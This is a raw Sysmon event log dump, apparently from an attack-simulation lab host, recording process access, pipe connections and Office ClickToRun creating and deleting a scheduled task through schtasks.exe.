14:58:01.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.732{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.732{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44724268C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1481b|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f8d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.746{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\Office Feature Updates Logon" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates Logon.xml"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000076950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.732{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature Updates LogonMD5=AD6DC17A43C5A6AEAEFC6CA714B15B82,SHA256=92C50917601489F24BF8183726DCC073048E779053389EB5AF555D72F95DAB37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.732{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-EE0D-00000000BB01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.732{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-EE0D-00000000BB01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.717{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.701{A7A01FEF-EBF9-607E-ED0D-00000000BB01}55085780C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.701{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-ED0D-00000000BB01}5508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.701{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.701{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44724268C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1481b|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f8d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.703{A7A01FEF-EBF9-607E-EC0D-00000000BB01}4532C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\Office Feature Updates Logon"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 10341000x800000000000000076935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000076931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:58:01.686{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature Updates2021-04-20 14:55:55.751 10341000x800000000000000076930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 